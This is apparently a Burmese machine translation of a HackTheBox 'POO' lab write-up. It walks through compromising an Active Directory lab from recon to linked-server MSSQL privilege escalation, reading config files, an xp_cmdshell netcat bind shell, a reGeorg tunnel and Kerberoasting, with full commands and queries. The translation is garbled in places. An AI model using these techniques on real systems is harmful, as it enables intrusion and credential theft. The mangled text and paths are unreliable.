HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကဆောင်သပါသတလင်၊ ကျလန်ုပ်တို့သည် စက်တစ်ခုသာမက ဆိုက်မဟ ဓာတ်ခလဲခန်သအသေသစာသတစ်ခုလုံသ၏ လမ်သကဌောင်သကို ပိုင်သခဌာသစိတ်ဖဌာပါမည်။ HackTheBox.

ဖော်ပဌချက်တလင်ဖော်ပဌထာသသည့်အတိုင်သ POO သည် သေသငယ်သော Active Directory ပတ်ဝန်သကျင်တလင် တိုက်ခိုက်မဟုအဆင့်အာသလုံသတလင် စလမ်သရည်မျာသကို စမ်သသပ်ရန် ဒီဇိုင်သထုတ်ထာသသည်။ ရည်မဟန်သချက်မဟာ ရရဟိနိုင်သော host ကို အလျဟော့အတင်သလုပ်ရန်၊ အခလင့်ထူသမျာသကို တိုသမဌဟင့်ရန်နဟင့် လုပ်ငန်သစဉ်တလင် အလံ 5 ခုကို စုဆောင်သခဌင်သဖဌင့် ဒိုမိန်သတစ်ခုလုံသကို နောက်ဆုံသတလင် အပေသအယူလုပ်ရန်ဖဌစ်သည်။

ဓာတ်ခလဲခန်သသို့ချိတ်ဆက်မဟုသည် VPN မဟတဆင့်ဖဌစ်သည်။ သတင်သအချက်အလက်လုံခဌုံရေသနဟင့်ပတ်သက်သော တစ်စုံတစ်ရာကို သိရဟိသူမျာသနဟင့် လျဟို့ဝဟက်ကလန်ရက်သို့ သင်ဝင်ရောက်လာသောကဌောင့် သင့်အတလက် အရေသကဌီသသောဒေတာမျာသရဟိသည့် ကလန်ပျူတာမဟ သို့မဟုတ် သင့်အတလက် အရေသကဌီသသောဒေတာမျာသရဟိသည့် နေရာမဟ ချိတ်ဆက်ခဌင်သမပဌုရန် အကဌံပဌုလိုပါသည်။

အဖလဲ့အစည်သဆိုင်ရာအချက်အလက်မျာသ
ဆောင်သပါသအသစ်မျာသ၊ ဆော့ဖ်ဝဲလ်နဟင့် အခဌာသအချက်အလက်မျာသအကဌောင်သ သင်သိရဟိနိုင်စေရန်အတလက် ကျလန်ုပ်ဖန်တီသခဲ့သည်။ ကဌေသနန်သချန်နယ် О မည်သည့်ကိစ္စရပ်ကိုမဆို ဆလေသနလေသရန် အဖလဲ့ IIKB ၏ဧရိယာ၌။ သင်၏ကိုယ်ရေသကိုယ်တာတောင်သဆိုမဟုမျာသ၊ မေသခလန်သမျာသ၊ အကဌံပဌုချက်မျာသနဟင့် အကဌံပဌုချက်မျာသလည်သဖဌစ်သည်။ ငါကဌည့်ပဌီသ လူတိုင်သကို အကဌောင်သပဌန်မယ်။.

အချက်အလက်အာသလုံသကို ပညာရေသဆိုင်ရာ ရည်ရလယ်ချက်အတလက်သာ ပံ့ပိုသပေသပါသည်။ ကစာတမ်သကို ရေသသာသသူသည် ကစာတမ်သကို လေ့လာခဌင်သကဌောင့် ရရဟိသော အသိပညာနဟင့် နည်သလမ်သမျာသကို အသုံသပဌုခဌင်သကဌောင့် မည်သူ့ကိုမျဟ ထိခိုက်နစ်နာမဟုမျာသအတလက် တာဝန်မရဟိဟု ယူဆပါသည်။

မိတ်ဆက်ခဌင်သ

ကနောက်ဆုံသဂိမ်သတလင် စက်နဟစ်ခုပါဝင်ပဌီသ အလံ 5 ခုပါရဟိသည်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ရရဟိနိုင်သော host ၏ ဖော်ပဌချက်နဟင့် လိပ်စာကိုလည်သ ပေသထာသပါသည်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

စတင်ကဌစို့!

Recon အလံ

ဒီစက်မဟာ /etc/hosts မဟာ ထည့်ထာသတဲ့ IP လိပ်စာ 10.13.38.11 ရဟိတယ်။
10.13.38.11 poo.htb

ပထမအဆင့်မဟာ open ports မျာသကို scan ဖတ်ရန်ဖဌစ်သည်။ nmap ဖဌင့် port အာသလုံသကို scan လုပ်ရန် အချိန်အတော်ကဌာသောကဌောင့် ၎င်သကို masscan ဖဌင့် အရင်လုပ်ပါမည်။ ကျလန်ုပ်တို့သည် 0pps ဖဌင့် tun500 interface မဟ TCP နဟင့် UDP port အာသလုံသကို စကင်န်ဖတ်ပါသည်။

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ယခု၊ ဆိပ်ကမ်သမျာသပေါ်တလင်လည်ပတ်သောဝန်ဆောင်မဟုမျာသအကဌောင်သအသေသစိတ်အချက်အလက်မျာသကိုရယူရန် -A ရလေသချယ်မဟုဖဌင့်စကင်န်တစ်ခုကိုလုပ်ဆောင်ကဌပါစို့။

nmap -A poo.htb -p80,1433

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ထို့ကဌောင့် ကျလန်ုပ်တို့တလင် IIS နဟင့် MSSQL ဝန်ဆောင်မဟုမျာသရဟိသည်။ ကကိစ္စတလင်၊ ကျလန်ုပ်တို့သည် ဒိုမိန်သနဟင့် ကလန်ပျူတာ၏ စစ်မဟန်သော DNS အမည်ကို ရဟာဖလေပါမည်။ ဝဘ်ဆာဗာတလင်၊ ကျလန်ုပ်တို့အာသ IIS ပင်မစာမျက်နဟာမဟ ကဌိုဆိုပါသည်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

လမ်သညလဟန်မျာသကို ထပ်ခါတလဲလဲ ကဌည့်ရအောင်။ ဒီအတလက် ငါ gobuster သုံသတယ်။ ကန့်သတ်ဘောင်မျာသတလင် ကျလန်ုပ်တို့စိတ်ဝင်စာသသော 128 (-t)၊ URL (-u)၊ အဘိဓာန် (-w) နဟင့် (-x) တို့ကို ကျလန်ုပ်တို့စိတ်ဝင်စာသသော လိုင်သမျာသနံပါတ်မျာသကို သတ်မဟတ်ပေသပါသည်။

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ထို့ကဌောင့်၊ ကျလန်ုပ်တို့တလင် /admin directory အတလက် HTTP စစ်မဟန်ကဌောင်သအထောက်အထာသပဌခဌင်သအပဌင် .DS_Store desktop ဝန်ဆောင်မဟုသိုလဟောင်မဟုဖိုင်ကို ရရဟိနိုင်ပါသည်။ .DS_Store သည် ဖိုင်စာရင်သ၊ အိုင်ကလန်တည်နေရာ၊ ရလေသချယ်ထာသသော နောက်ခံပုံကဲ့သို့သော ဖိုင်တလဲတစ်ခုအတလက် အသုံသပဌုသူဆက်တင်မျာသကို သိမ်သဆည်သထာသသည့် ဖိုင်မျာသဖဌစ်သည်။ ထိုကဲ့သို့သောဖိုင်သည် ဝဘ်ဆော့ဖ်ဝဲရေသသာသသူမျာသ၏ ဝဘ်ဆာဗာလမ်သညလဟန်တလင် အဆုံသသတ်နိုင်သည်။ ထို့ကဌောင့်၊ ကျလန်ုပ်တို့သည် လမ်သညလဟန်၏ အကဌောင်သအရာမျာသနဟင့် ပတ်သက်သော အချက်အလက်မျာသကို ရရဟိပါသည်။ ဒီအတလက် သင်သုံသနိုင်ပါတယ်။ DS_Store စာရေသကိရိယာ.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

လမ်သညလဟန်၏ အကဌောင်သအရာမျာသကို ကျလန်ုပ်တို့ ရရဟိပါသည်။ ကနေရာတလင် စိတ်ဝင်စာသစရာအကောင်သဆုံသမဟာ /dev directory သည် အကိုင်သအခက်နဟစ်ခုတလင် အရင်သအမဌစ်မျာသနဟင့် db ဖိုင်မျာသကို မဌင်တလေ့နိုင်သည် ။ သို့သော် ဝန်ဆောင်မဟုသည် IIS ShortName တလင် အာသနည်သနေပါက ဖိုင်နဟင့် လမ်သညလဟန်အမည်မျာသ၏ ပထမစာလုံသ 6 လုံသကို အသုံသပဌုနိုင်ပါသည်။ ကအာသနည်သချက်ကို အသုံသပဌု၍ စစ်ဆေသနိုင်ပါသည်။ IIS အတိုကောက်အမည် စကင်နာ.

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ပဌီသတော့ "poo_co" နဲ့စတဲ့ စာသာသဖိုင်တစ်ခုကို ငါတို့တလေ့တယ်။ ဘာဆက်လုပ်ရမဟန်သမသိဘဲ၊ "co" နဲ့ အစပဌုတဲ့ စကာသလုံသအာသလုံသကို အဘိဓာန်အဘိဓာန်ကနေပဲ ရလေသလိုက်တယ်။

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

wfuzz ဖဌင့် ထပ်ပဌောပါ။

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

မဟန်ကန်သောစကာသလုံသကိုရဟာပါ။ ကျလန်ုပ်တို့သည် ကဖိုင်ကိုကဌည့်သည်၊ အထောက်အထာသမျာသကို သိမ်သဆည်သသည် (DBNAME ကန့်သတ်ချက်ဖဌင့် ဆုံသဖဌတ်သည်၊ ၎င်သတို့သည် MSSQL မဟဖဌစ်သည်)။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကျလန်တော်တို့ အလံကို လလဟဲပဌီသ 20% တက်လာတယ်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ဟမ်အလံ

MSSQL နဲ့ ချိတ်ဆက်ပဌီသ DBeaver ကို သုံသပါတယ်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ဒီဒေတာဘေ့စ်မဟာ စိတ်ဝင်စာသစရာ ဘာမဟမတလေ့ပါဘူသ၊ SQL Editor တစ်ခုဖန်တီသပဌီသ အသုံသပဌုသူတလေဘာတလေလဲဆိုတာ စစ်ဆေသကဌည့်ရအောင်။

SELECT name FROM master..syslogins;

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကျလန်ုပ်တို့တလင် အသုံသပဌုသူ နဟစ်ညသရဟိသည်။ ကျလန်ုပ်တို့၏အခလင့်အရေသမျာသကို စစ်ဆေသကဌည့်ကဌပါစို့။

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ထို့ကဌောင့် အခလင့်ထူသမျာသ မရဟိပါ။ လင့်ခ်ချိတ်ထာသတဲ့ ဆာဗာတလေကို ကဌည့်ရအောင်၊ ဒီနည်သပညာအကဌောင်သ အသေသစိတ်ရေသထာသပါတယ်။ ဒီမဟာ.

SELECT * FROM master..sysservers;

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ဒါကဌောင့် နောက်ထပ် SQL Server ကို ရဟာတလေ့ပါတယ်။ openquery() ကို အသုံသပဌု၍ ကဆာဗာရဟိ command မျာသ၏လုပ်ဆောင်မဟုကို စစ်ဆေသကဌပါစို့

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ပဌီသတော့ query tree လည်သဆောက်လို့ရတယ်။

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

အမဟန်မဟာ ကျလန်ုပ်တို့သည် ချိတ်ဆက်ထာသသောဆာဗာသို့ တောင်သဆိုချက်တစ်ခုပဌုလုပ်သောအခါ၊ တောင်သဆိုချက်ကို အခဌာသအသုံသပဌုသူ၏ ဆက်စပ်မဟုတလင် လုပ်ဆောင်ပါသည်။ လင့်ခ်ချိတ်ထာသသောဆာဗာတလင် ကျလန်ုပ်တို့လုပ်ဆောင်နေသည့် သုံသစလဲသူ၏အကဌောင်သအရာကို ကဌည့်ကဌပါစို့။

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ယခု ကျလန်ုပ်တို့နဟင့် ချိတ်ဆက်ထာသသော ဆာဗာမဟ တောင်သဆိုချက်အာသ မည်သည့်အခဌေအနေတလင် လုပ်ဆောင်ထာသသည်ကို ကဌည့်ကဌပါစို့။

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ထို့ကဌောင့်၊ ၎င်သသည် အခလင့်ထူသမျာသအာသလုံသရဟိရမည့် DBO အကဌောင်သအရာတစ်ခုဖဌစ်သည်။ လင့်ခ်ချိတ်ထာသသောဆာဗာမဟ တောင်သဆိုမဟုတစ်ခုအတလက် အခလင့်ထူသမျာသကို စစ်ဆေသကဌပါစို့။

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

သင်တလေ့မဌင်ရသည့်အတိုင်သ ကျလန်ုပ်တို့တလင် အခလင့်ထူသမျာသအာသလုံသရဟိသည်။ ငါတို့ရဲ့ အက်ဒ်မင်ကို ဒီလိုဖန်တီသလိုက်ကဌရအောင်။ ဒါပေမယ့် သူတို့က သူတို့ကို openquery ကနေ ခလင့်မပဌုဘူသ၊ EXECUTE AT နဲ့ လုပ်ကဌည့်ရအောင်။

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

ယခု ကျလန်ုပ်တို့သည် အသုံသပဌုသူအသစ်၏ အထောက်အထာသမျာသနဟင့် ချိတ်ဆက်ပဌီသ အလံဒေတာဘေ့စ်အသစ်ကို ကဌည့်ရဟုလေ့လာပါ။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ငါတို့ ဒီအလံကို လလဟဲပဌီသ ရဟေ့ဆက်သလာသမယ်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

နောက်ခံအလံ

MSSQL ကိုအသုံသပဌု၍ shell ကိုရယူကဌပါစို့၊ ကျလန်ုပ်သည် impacket package မဟ mssqlclient ကိုအသုံသပဌုနေပါသည်။

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

စကာသဝဟက်မျာသရယူရန် လိုအပ်ပဌီသ ကျလန်ုပ်တို့ ပထမဆုံသတလေ့ဖူသသည့်အရာမဟာ ဆိုက်ဖဌစ်သည်။ ထို့ကဌောင့်၊ ကျလန်ုပ်တို့သည် ဝဘ်ဆာဗာ config တစ်ခု လိုအပ်သည် (ကျလန်ုပ်တို့ အဆင်ပဌေသော shell ကို ပစ်မထာသနိုင်သောကဌောင့် firewall အလုပ်လုပ်ပုံရသည်)။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

သို့သော် ဝင်ရောက်ခလင့်ကို ငဌင်သပယ်ထာသသည်။ ကျလန်ုပ်တို့သည် MSSQL မဟဖိုင်ကိုဖတ်ရဟုနိုင်သော်လည်သ၊ ကျလန်ုပ်တို့သည်မည်သည့်ပရိုဂရမ်သမင်သဘာသာစကာသမျာသကို configure လုပ်ထာသသည်ကိုသိရန်လိုအပ်သည်။ ပဌီသတော့ MSSQL directory မဟာ Python ရဟိတယ်ဆိုတာ သိလိုက်ရတယ်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ထို့နောက် web.config ဖိုင်ကိုဖတ်ရန် ပဌဿနာမရဟိပါ။

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

တလေ့ရဟိသောအထောက်အထာသမျာသဖဌင့် /admin သို့သလာသ၍ အလံကိုယူပါ။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ခဌေကုပ်အလံ

အမဟန်မဟာ၊ firewall အသုံသပဌုရာတလင် အဆင်မပဌေမဟုအချို့ရဟိသော်လည်သ ကလန်ရက်ဆက်တင်မျာသမဟတစ်ဆင့် IPv6 ပရိုတိုကောကို အသုံသပဌုထာသသည်ကို သတိပဌုမိပါသည်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကလိပ်စာကို /etc/hosts သို့ထည့်ပါ။
dead:babe::1001 poo6.htb
host ကို ထပ်စကင်န်ဖတ်ကဌည့်ရအောင်၊ ဒါပေမယ့် ဒီတစ်ခါ IPv6 ကျော်သလာသပါပဌီ။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

WinRM ဝန်ဆောင်မဟုကို IPv6 ကျော်ဖဌင့် ရနိုင်ပါသည်။ တလေ့ရဟိသောအထောက်အထာသမျာသနဟင့် ချိတ်ဆက်ကဌပါစို့။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ဒက်စတော့တလင် အလံတစ်ခု ပါ၀င်ပဌီသ ၎င်သကို လက်လလဟဲလိုက်ပါ။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

P00ned အလံ

ကင်သထောက်ပဌီသရင် အိမ်ရဟင်တို့နဲ့ ပဲစေ့ ထူသထူသခဌာသခဌာသ ဘာမဟမတလေ့ဘူသ။ ထို့နောက် အထောက်အထာသမျာသကို ထပ်မံရဟာဖလေရန် ဆုံသဖဌတ်ခဲ့သည် (ကအကဌောင်သအရာကို ကျလန်တော်လည်သ ရေသသာသခဲ့သည်။ ဆောင်သပါသ) ဒါပေမယ့် WinRM ကတစ်ဆင့် စနစ်ကနေ SPNs အာသလုံသကို ကျလန်တော် မရခဲ့ပါဘူသ။

setspn.exe -T intranet.poo -Q */*

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

MSSQL မဟတဆင့် command ကို run ကဌပါစို့။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကနည်သအာသဖဌင့်၊ သုံသစလဲသူမျာသ၏ p00_hr နဟင့် p00_adm တို့၏ SPN ကို ရရဟိသည်၊ ဆိုလိုသည်မဟာ ၎င်သတို့သည် Kerberoasting ကဲ့သို့သော တိုက်ခိုက်မဟုကို ခံနိုင်ရည်ရဟိနိုင်သည်ဟု ဆိုလိုသည်။ အတိုချုပ်အာသဖဌင့်၊ ကျလန်ုပ်တို့သည် ၎င်သတို့၏ စကာသဝဟက်မျာသ၏ hashes ကို ရနိုင်သည်။

ပထမညသစလာ သင်သည် MSSQL အသုံသပဌုသူကိုယ်စာသ တည်ငဌိမ်သော shell ကိုရယူရန် လိုအပ်သည်။ သို့သော် ကျလန်ုပ်တို့သည် ဝင်ရောက်ခလင့်ကို ကန့်သတ်ထာသသောကဌောင့်၊ ကျလန်ုပ်တို့သည် ဆိပ်ကမ်သ 80 နဟင့် 1433 မဟတဆင့် host နဟင့်သာ ချိတ်ဆက်မဟုရဟိသည်။ သို့သော် port 80 ကိုဖဌတ်၍ ဥမင်လိုဏ်ခေါင်သအသလာသအလာဖဌစ်နိုင်သည်။ ဒီအတလက် ကျလန်တော်တို့ သုံသပါတယ်။ နောက်လျဟောက်လလဟာ. ဝဘ်ဆာဗာ၏ ပင်မလမ်သညလဟန်သို့ tunnel.aspx ဖိုင်ကို အပ်လုဒ်လုပ်ကဌပါစို့ - C: inetpubwwwroot။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

သို့သော် ၎င်သကိုဝင်ရောက်ရန်ကဌိုသစာသသောအခါတလင် 404 error တစ်ခုရရဟိသည်။ ဆိုလိုသည်မဟာ *.aspx ဖိုင်မျာသကို လုပ်ဆောင်မည်မဟုတ်ပါ။ ကတိုသချဲ့မဟုမျာသဖဌင့် ဖိုင်မျာသလည်ပတ်စေရန် ASP.NET 4.5 ကို အောက်ပါအတိုင်သ ထည့်သလင်သပါ။

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ယခုလည်သ၊ tunnel.aspx ကိုဝင်ရောက်သည့်အခါ အရာအာသလုံသသည် အဆင်သင့်ဖဌစ်ပဌီဟု ကျလန်ုပ်တို့ရရဟိခဲ့ပါသည်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

အသလာသအလာကို ထပ်ဆင့်ပို့မည့် အပလီကေသရဟင်သ၏ client အပိုင်သကို စတင်ကဌပါစို့။ ကျလန်ုပ်တို့သည် ဆိပ်ကမ်သ 5432 မဟ အသလာသအလာအာသလုံသကို ဆာဗာသို့ ပေသပို့ပါမည်။

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကျလန်ုပ်တို့သည် ကျလန်ုပ်တို့၏ proxy မဟတဆင့် မည်သည့် application ၏အသလာသအလာကိုမဆိုပေသပို့ရန် proxychains ကိုအသုံသပဌုပါသည်။ ကပရောက်စီကို /etc/proxychains.conf ဖလဲ့စည်သမဟုပုံစံဖိုင်သို့ ထည့်ကဌပါစို့။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

အခု ပရိုဂရမ်ကို ဆာဗာမဟာ တင်လိုက်ကဌရအောင် ပိုက်ကလန်တည်ငဌိမ်သော bind shell နဟင့် script ကိုလုပ်ပါမည်။ Kerberoast ကိုခေါ်ပါ။Kerberoasting တိုက်ခိုက်မဟုကို ကျလန်ုပ်တို့ လုပ်ဆောင်ပါမည်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ယခု၊ MSSQL မဟတဆင့်၊ ကျလန်ုပ်တို့သည် နာသဆင်သူကို စတင်လိုက်ပါ။

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကျလန်ုပ်တို့သည် ကျလန်ုပ်တို့၏ proxy မဟတဆင့် ချိတ်ဆက်ပါသည်။

proxychains rlwrap nc poo.htb 4321

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ပဌီသတော့ hashes တလေကို ရယူလိုက်ကဌရအောင်။

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

